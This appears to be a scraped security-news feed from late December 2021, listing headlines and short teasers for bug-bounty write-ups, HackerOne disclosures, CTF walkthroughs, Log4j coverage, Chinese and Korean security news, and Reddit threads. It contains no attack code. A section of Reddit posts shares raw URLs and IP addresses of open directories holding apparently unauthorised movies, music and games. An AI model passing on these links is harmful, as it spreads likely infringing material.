    Before reading that article you can also check Javascript-101 Embedding objects and arrays. Continue reading on Medium »  ( 3 min )
    My first Google HOF
    Whoever starts learning about bug hunting, their dream is to get a bounty and HOF from Google. I too got successful in June 2021 when I… Continue reading on Medium »  ( 2 min )
    AWS Lambda Command Injection
    Command Injection vulnerability is a daunting one. In this vulnerability, a threat actor can execute arbitrary commands on a host. Continue reading on Towards AWS »  ( 4 min )
  • Open

    SecWiki News 2021-12-31 Review
    万字长文:物联网十年简史 by ourren Typora 授权解密与剖析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-31 Review
    万字长文:物联网十年简史 by ourren Typora 授权解密与剖析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    @RealTryHackMe #AdventOfCyber Series: Challenge 5 — Pesky Elf Forum
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
    @RealTryHackMe #AdventOfCyber Series: Challenge 4 — Santa’s Running Behind
    Another day, another challenge… Continue reading on Medium »  ( 1 min )
  • Open

    Improper authorization allows disclosing users' notification data in Notification channel server
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/1314162 - Bounty: $2000
    ADB Backup is enabled within AndroidManifest
    Zivver disclosed a bug submitted by hack_4fun: https://hackerone.com/reports/1225158
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    PIT HackTheBox Walkthrough
    Pit is a CTF Linux box with difficulty rated as a medium on Hack The Box platform. Let’s deep dive into breaking down this machine. The post PIT HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    FreeBuf早报 | 京都大学77TB数据被误删;2022 年值得关注的5大网络安全趋势
    日本京都大学在网站发布公告,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。  ( 1 min )
    FreeBuf甲方群讨论 | 年度总结,甲方网安人的2021
    这一年有哪些令你印象深刻的事件,带给你怎样的思考,对行业现状及发展态势有何看法?甚至是聊聊职业本身,对未来职业发展有何规划?  ( 1 min )
    FreeBuf周报 |《“十四五”国家信息化规划》发布;Apache 修复关键漏洞
    我们总结推荐了本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    Kimsuky组织针对韩国新闻行业的钓鱼活动分析
    Kimsuky是一个疑似来源于半岛方向的网络间谍组织,其至少自 2012 年以来一直保持活跃。  ( 1 min )
    为什么说减少开发人员和安全团队之间摩擦有助提高软件安全性
    与其将安全性推迟到以后,不如让它成为开发过程的核心部分。
    渗透测试之地基服务篇:服务攻防之框架Struts2(上)
    Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。  ( 1 min )
    新型恶意软件 iLOBleed Rootkit,首次针对惠普 iLO 固件
    iLOBleed 是有史以来首次针对惠普 iLO 固件的恶意软件。  ( 1 min )
    日本惠普超算系统出错,京都大学多达77TB数据被误删
    日本京都大学在网站发布公告称,由于惠普超级计算机的备份系统出现错误,学校丢失了大约 77TB的研究数据。
  • Open

    Windows Process Listing Using WTS API
    In these detailed walkthroughs of process listing using WTS API, you will learn the importance of the process listing and enumeration of anti-malware agents and will get your hands dirty with the source code https://tbhaxor.com/windows-process-listing-using-wtsapi32/ https://tbhaxor.com/windows-process-listing-using-wtsapi32-2/ submitted by /u/tbhaxor [link] [comments]

  • Open

    Movies and tv, but not sure how much in english. Seems to be vey slow.
    submitted by /u/International_Milk_1 [link] [comments]
    Racer X stuff
    submitted by /u/International_Milk_1 [link] [comments]
    Creating your own flair
    So you want to share a link to top secret documents. You want to call the Flair "Could get you killed" Just pick any of the default flairs, enter it in document, highlight it, and write "could get you killed" instead. submitted by /u/International_Milk_1 [link] [comments]
    comics, and Ebooks
    submitted by /u/International_Milk_1 [link] [comments]
    ]Kamen Rider Build BD Box Complete Series [1080p]-english subs
    submitted by /u/International_Milk_1 [link] [comments]
    Star tek films, movies. comics. etc etc
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Ghibli's Films - Google Drive
    submitted by /u/International_Milk_1 [link] [comments]
    Bond movies (Note sure, if this is correct link)-see comment
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Games (don't know if link's work)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Tom and Jerry cartoons
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    comics
    submitted by /u/International_Milk_1 [link] [comments]
    Movies
    http://167.114.174.132:9092/movies/ Haven't looked too far thru this yet but good amount of movies. submitted by /u/Prhymus [link] [comments]
    Indian (I'm assuming) music
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    Not only cybersecurity
    Hi, I really love cybersecurity stuff, but as I practice with TryHackMe/HackTheBox labs, I feel that some programming knowledge is also required. What are your studying topics, besides offensive/defensive techniques? Can you recommend some good resources for PHP, assembler, javascript and so on? Thankyou!! submitted by /u/g-simon [link] [comments]  ( 1 min )
    DNSSEC with unsigned records set
    Hello everyone, I'm currently implementing a DNSSEC validator (at https://github.com/qdm12/dns). It's working so far, but most zones aren't signed (even google.com it seems). How is a DNSSEC validator meant to handle unsigned cases? Should it just let it through without any validation? Or should it check somewhere else if a zone is meant to be signed? Or should we patiently wait for DNSSEC to be more widely adopted? I'm wondering for example in the case an attacker hacks an authoritative nameserver like Cloudflare's 1.1.1.1 and returns bad records without their previously existing RRSIG signatures. A DNSSEC validator (without caching or on a cold boot) will not detect the bad records from Cloudflare right? Thanks in advance! submitted by /u/dowitex [link] [comments]  ( 1 min )
    Are Server+, Cloud+, and Linux+ certifications useful for InfoSec?
    submitted by /u/Connect_Estate_8617 [link] [comments]  ( 1 min )
    I accessed someone else's Yahoo mail by mistake. This needs to get fixed ASAP
    hello everyone I got a new phone number, and something really unbelievable happened to me: I was able to access someone else's Yahoo! mail account - the previous user of that phone number. I Googled it to see if anyone else has experienced this, and cybersecurity expert Brian Krebs reports that has in this article: https://krebsonsecurity.com/2019/03/why-phone-numbers-stink-as-identity-proof/ From the article itself : " This is exactly what happened recently to a reader who shared this account: A while ago I bought a new phone number. I went on Yahoo! mail and typed in the phone number in the login. It asked me if I wanted to receive an SMS to gain access. I said yes, and it sent me a verification key or access code via SMS. I typed the code I received. I was surprised that I didn’…  ( 4 min )
    Is IT experience a requirement for SOC Analyst?
    Is it required that you worked in the help desk or be a sysadmin? If so, how many years? Or is home experience enough for the roll(example: homelab, ctfs, github projects) submitted by /u/RaZdoT [link] [comments]  ( 2 min )
    Phone Tapping -- Call Forwarding UNconditionally, but everything else is NOT forwarded
    So I checked my dad's phone for tapping. This is what the system message said: Call forwarding unconditionally. Voice: Not forwarded Data: Not forwarded FAX: Not forwarded SMS: Not forwarded Sync: Not forwarded Async: Not forwarded Packet: Not forwarded PAD: Not forwarded OK Given the info above, is he still being phone tapped? Last time, he was and I saw the number. Now I didn't. submitted by /u/Then-Mathematician76 [link] [comments]  ( 1 min )
    Are You Running Linux As Your Main Workstation?
    Are you running Linux as your main workstation? What do the professionals run as their main operating system? submitted by /u/No_Secret6425 [link] [comments]  ( 2 min )
    Offsec Discontinue Kali on Azure?
    Did Offensive Security discontinue support for Kali on the Azure cloud? https://github.com/Azure/azure-cli/issues/17469 Found this thread and can’t find Kali in the azure marketplace or on their site anymore. submitted by /u/DeadbeatHoneyBadger [link] [comments]
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Ffuf TryHackMe par
    Writeup  ( 2 min )
    Easy Premium Account Access and Admin role escalation via Object manipulation in the server…
    Hey infosec Geeks ✌,  ( 2 min )
    HacktoberFest2k21 vulnerability: How users metadata can be changed via Auth JWT tokens leaking from…
    Hello Awesome readers 👨‍💻✌✌,  ( 3 min )
    Cookie Stealing via Clickjacking using Burp collaborator
    Hello 👋 infosec geeks 👨‍💻 this is my 4th blog post,  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾,  ( 3 min )
    CTF Write-Up: Kryptonite
    CTF challenge available at ctf-mystiko.com.  ( 5 min )
  • Open

    Read-only user can edit user segments.
    Mail.ru disclosed a bug submitted by astates: https://hackerone.com/reports/1277753
    DLL hijacking in Monero GUI for Windows 0.17.3.0 would allow an attacker to perform remote command execution
    Monero disclosed a bug submitted by fukuyama: https://hackerone.com/reports/1437942
    API- /
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1354452
    Change project visibility to a restricted option
    GitLab disclosed a bug submitted by s4nderdevelopment: https://hackerone.com/reports/1086781 - Bounty: $1370
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Windows Privilege Escalation: Kernel Exploit
    As this series was dedicated to Windows Privilege escalation thus I’m writing this Post to explain command practice for kernel-mode exploitation. Table of Content What The post Windows Privilege Escalation: Kernel Exploit appeared first on Hacking Articles.  ( 5 min )
  • Open

    Here’s How I Could Read Anyone’s Iphone Metrics Remotely.
    Hello, My name is Faizan. I’m a security researcher. Hope you like this blog. If you’ve any questions please feel free to reach out . Continue reading on Medium »  ( 2 min )
    TryHackMe Writeup : Solar, exploiting Log4J
    Hi there, Continue reading on Medium »  ( 6 min )
    Javascript 101 - Embedding objects & Arrays — 03
    Before reading this, you can look at Javascript 101 — Arithmetic Operators, Code Editors, Functions, Objects, and Arrays — 02. Continue reading on Medium »  ( 3 min )
    Caduceus Bug Bounty Challenge
    Caduceus has just entered its public testing phase and is launching this hackathon to identify bugs. Continue reading on Medium »  ( 2 min )
    Bitswift Unlimited Mint Bugfix Postmortem
    Summary Continue reading on Immunefi »  ( 4 min )
    The Password Bypass Leads to Full-Account-Takeover
    Hola Hackers, I’m Saransh Saraf aka MR23R0 Continue reading on Medium »  ( 1 min )
  • Open

    [Cellebrite Physical Analyzer] Basic usage question, easily resuming a session/case with multiple extractions
    Just started working with this program. I understand how to open and browse extractions, but I can't figure out if there's a better way to pick up where I left off after closing the program, I end up having to open/import all the extractions one by one again. For most programs that I'm familiar with, a "case" contains one or more extractions that I imported and "opening a case" tends to be a convenient way to bring up all the extractions in one "click". However, based on how little experience I have with PA, "opening a case" seems to just be a prompt to import extractions all over again. I thought about using "project sessions", but it seems to be something that you open after all the extractions are open that remembers what analysis you've done, not necessarily what devices you were working on. Can anyone speak to this? Am I oblivious to a basic function that lets me easily open all the extractions I had open? Maybe I'm supposed to create a portable case (UFDX?) or something? submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-30 Review
    ZN600电信光猫分析 —— 初识 by ourren 写给研发同学的富文本安全过滤方案 by ourren Tenda AX12路由器设备分析(二)之UPnP协议 by ourren 一款通过污点追踪发现Jsp webshell的工具 by ourren 快速探测目标防火墙出网端口的工具化实现 by ourren 聊聊配置文件 RCE 这件事 by ourren 扫描器性能分析案例 by ourren 内核态eBPF程序实现容器逃逸与隐藏账号rootkit by ourren 软件供应链安全发展洞察报告(2021年) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-30 Review
    ZN600电信光猫分析 —— 初识 by ourren 写给研发同学的富文本安全过滤方案 by ourren Tenda AX12路由器设备分析(二)之UPnP协议 by ourren 一款通过污点追踪发现Jsp webshell的工具 by ourren 快速探测目标防火墙出网端口的工具化实现 by ourren 聊聊配置文件 RCE 这件事 by ourren 扫描器性能分析案例 by ourren 内核态eBPF程序实现容器逃逸与隐藏账号rootkit by ourren 软件供应链安全发展洞察报告(2021年) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    I wrote a replacement for Pyrasite to inject code into Python processes on Kubernetes
    submitted by /u/nyellin [link] [comments]  ( 1 min )
    Bootkit samples
    submitted by /u/hardenedvault [link] [comments]
  • Open

    TryHackMe | CTF | Walkthrough | Raven
    Checkout this virtual machine on TryHackMe. LogIn on TryHackMe, go to rooms → raven1he. Link: https://tryhackme.com/room/raven1he Continue reading on Medium »  ( 3 min )
  • Open

    Upgrade your OSINT investigations with Maltego
    What is Maltego anyway? Continue reading on Medium »  ( 1 min )
    OSINT — Sakura (TryHackMe walktrough)
    The OSINT Dojo recently found themselves the victim of a cyber attack. It seems that there is no major damage, and there does not appear… Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 微信小程序调用个人信息需授权;亚马逊 Alexa 语音助手越界
    2022年2月21日起,小程序访问蓝牙、通讯录,以及添加日历事件,必须经过用户授权。  ( 1 min )
    威胁狩猎架构体系架构与实践 | CIS 2021 Spring·春日版大会议题初探
    威胁狩猎是目前业内公认的最有效的主动型安全解决方案之一,可最大限度降低网络攻击对企业的危害。  ( 1 min )
    T-Mobile称:用户数据泄露由SIM卡交换攻击引起
    美国电信运营商T-Mobile发生了一起数据泄露事件,有不明数量的客户遭受了SIM交换攻击。
    DevSecOps建设之白盒续篇
    探索一款既能够满足企业内部自动化审计需求、又能够辅助白帽子日常快速挖掘漏洞的工具。  ( 4 min )
    IoT蜜罐展示物联网设备存在的网络威胁
    蜜罐历来被用作诱饵设备,帮助研究人员更好地了解网络上威胁的动态及其影响。  ( 1 min )
    超1200个网站使用MitM钓鱼工具包,允许网络犯罪分子绕过 2FA 身份验证
    中间人网络钓鱼工具包是不需要人工操作的实时网络钓鱼工具包,因为一切都是通过反向代理自动完成。  ( 1 min )
    ThinkPHP5反序列化利用链总结与分析
    本文将总结分析ThinkPHP5.0和5.1中的反序列化利用链,一方面以备不时之需,另一方面算是对php反序列化的深入学习。  ( 6 min )
    应急响应-Yara规则木马检测
    Yara是一个基于规则的恶意样本分析工具,可以帮助安全研究人员和蓝队分析恶意软件,并且可以在应急取证过程中自定义检测规则来检测恶意软件。  ( 1 min )
    地铁安防门被曝存在多个严重的安全漏洞
    这些漏洞可能允许远程攻击者绕过身份验证要求、篡改金属探测器配置,甚至在设备上执行任意代码。  ( 1 min )
    大型车企隐秘接口连续被泄露 我们该如何盘点公司资产
    大型甲方企业如何做资产盘点
    《2021企业安全运营实践报告》发布:从被动防御到主动出击
    从被动转主动,企业安全运营体系已牢牢抓住主动权。  ( 1 min )
  • Open

    갑작스럽게 kubectl not found가 발생했다면 😫
    평소에 잘 쓰던 kubectl이 갑자기 not found가 발생했습니다. (아마 특정 시점에 brew upgrade로 인해 문제가 됬을 것 같아요) zsh: command not found: kubectl 이미 설치된 상태이고, 재 설치를 해도 동일했습니다. 여기저기 찾아보니 homebrew로 설치한 경우에서 이 이슈가 발생하는 것 같은데요. brew로 kubectl을 재 설치하고 brew link로 설치된 파일을 심볼릭 링크로 homebrew prefix와 연결해주면 다시 명령을 사용할 수 있습니다. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli 참고로 homebrew prefix는 homebrew에서 사용하는 PATH 경로입니다.

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is!. Some know it but they have not yet faced a serious risk!. This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    hi all, I am doing the "Javascript deObfuscation" module on hackthebox platform (very very nice!) I read this: As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it. Can anyone explain me this? Possibly with an example? Thankyou submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. ​ I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? ​ The only way I can think they may have gotten my information was is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. ​ Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for MacOS and Windows both that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks help me out to choose best password manager. Let me know which password manager you are using and why? What's the best password manager betweens 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    01 - Original Sound Track Tokusatsus - ddl.tokusatsu-fansub.fr > Musiques > Tokusatsus Collection MP3 OST e BGM > 01 - Original Sound Track Tokusatsus Index of /criticalmasscatania/data/media (inventati.org) Index of /mp3 (pinballnirvana.com) Index of /tunes (syer.net) Index of /Music Index of /ftp/MP3 (bahiabeachtenerife.com) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    http://wrobradio.com/mp3s/ http://www.crypthome.com/members/Belle/vwavvv/ http://www.ibiblio.org/pha/dawk/Audio/ http://www.crescentmoon.club/All%20Music/ http://files.sfenyc.com/Music/?C=M;O=A http://woodrosepsp.com/judy/MUSIC/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    http://www.captainspud.com/stuff/music/ http://cvltnation.com/wp-content/audio/ https://anorg.chem.uu.nl/people/staff/FrankdeGroot/woXS/ https://dl.msbmusic.ir/d1/1398/Music/09/ http://tka4.org/tka4/articles/Music%20Listening/sound/ https://www.iutbayonne.univ-pau.fr/~lopis/BBand/Divers/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    https://www.acroche2.com/mid_jazz/ http://148.72.150.188/archive/access/audio/ http://91.121.145.85/panel/136/henk/Blue%20Note%20The%20Ultimate%20Jazz%20Collection/Blue%20Note%20-%20The%20Ultimate%20Jazz%20Collection%20-%20CD1/ http://pix.klunch.com:555/mp3/ http://www.doctorwhofanshop.com/mov/ https://ia801002.us.archive.org/27/items/tntvillage_381703/John%20Coltrane%20-%20Legacy%20%28Impulse%21%29%20%281955-67%29%20%28Disc%201%20-%20Harmonic%20%26%20Melodic%29/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists at least in the first directory. The rest seems to be covers and maybe original material by some french band. There is a trio mentioned in parent folder. But in open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads OD, is that already done? Is it a good idea? And could I be legally accused with anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guyz are doing well, Here is the story of how i am able to crash anyone’s mozilla firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-202144228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What is the major tips that anyone can share for this certification? One feedback that I heard from my colleagues that took it couple of months back was that the practice papers doesn't have much similarity to the actual exam. Which is kind of a concern as I have a GCIH (SANS SEC504) and my practice papers are very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    业务安全发展洞察报告 2021 by ourren 消费级物联网安全基线 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-29 Review
    业务安全发展洞察报告 2021 by ourren 消费级物联网安全基线 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    树莓派专刊---搭建kali环境
    拿起你吃灰的树莓派,做点有意义的事情! 面向想低成本学习信息安全的小白师傅们,一起动起来吧!  ( 1 min )
    FreeBuf早报 | 在线密码管理器LastPass被大规模撞库;好购App被法院认定侵害隐私权
    全球动态1. Log4j 2.17.1 现已发布,修复了新的远程代码执行错误Apache 发布了 Log4j 版本 2.17.1,修复了 2.17.0 中新发现的远程代码执行 (RCE) 漏洞,编号为 CVE-2021-44832。[外刊-阅读原文]2. 好购App未经许可读取用户手机剪贴板内容,法院认定侵害隐私权手机用户小林(化名)在使用好购App时发现,该App未经同意,擅自监测、收集其手机剪  ( 1 min )
    《信息安全技术 信息系统密码应用设计技术要求》(征求意见稿)发布
    《征求意见稿》提出了信息系统密码应用方案设计技术的建议,为开展信息系统密码应用方案设计提供指导参考。
    2026年,数据丢失防护市场规模将达到 62.65 亿美元
    2026年,数据丢失防护市场规模将达到62.65亿美元。  ( 1 min )
    既存安全风险又涉及侵权,三星应用商店现风险流媒体应用
    这些软件伪装成已停止运营的盗版影视应用程序——ShowBox,目前已在多个用户设备上触发了Play Protect安全警告。
    等保2.0与商密应用产品相关的48个问题合集(中)
    进入等级保护2.0时代,根据信息技术发展应用和网络安全态势,不断丰富了制度内涵、拓展保护范围、完善监管措施,逐步健全网络安全等级保护制度政策、标准和支撑体系。  ( 1 min )
    上云时代,企业云安全审计可以这么做!
    上云时代,企业应结合自身安全合规要求与公有云特性,制定云安全审计检查项;并有效利用公有云配置审计服务,提升云上审计自动化水平。  ( 1 min )
    重磅 | 【 2021中国白帽子调查报告】正式发布
    未来白帽子应该多多尝试过往不熟知、不擅长的漏洞领域,更新挖洞知识与技能。  ( 1 min )
    域内提权漏洞CVE-2021-42287与CVE-2021-42278原理分析
    综上所述,这个洞刚开始叫nopac其实就是针对跨域时的攻击,实战意义不大。  ( 3 min )
    线密码管理器LastPass被大规模撞库
    在线密码管理器LastPass承认,攻击者对其用户进行了大规模的撞库攻击,试图访问他们的云托管密码库。
  • Open

    Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
    Strategically aged domain detection can capture domains registered by advanced persistent threats or likely to be used for network abuses. The post Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends appeared first on Unit42.
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4 2.17 JDBCAppender RCE(CVE-2021-44832)
    또… 또나왔네요. 이전 글에서 한번에 쓰기에 너무 긴 내용이라 추가 CVE는 하나씩 분리해둘 생각입니다. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 위 버전이 취약합니다. 다만 무조건 취약한 상태는 아니고, 로깅 구성 파일을 수정할 수 있는 권한이 공격자에게 필요하기 때문에 공격 성공을 위해선 MITM 등의 부가적인 요소가 필요합니다. 그래서 이전 RCE 처럼 Critical 이슈는 아니고 Major(CVSS 6.
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
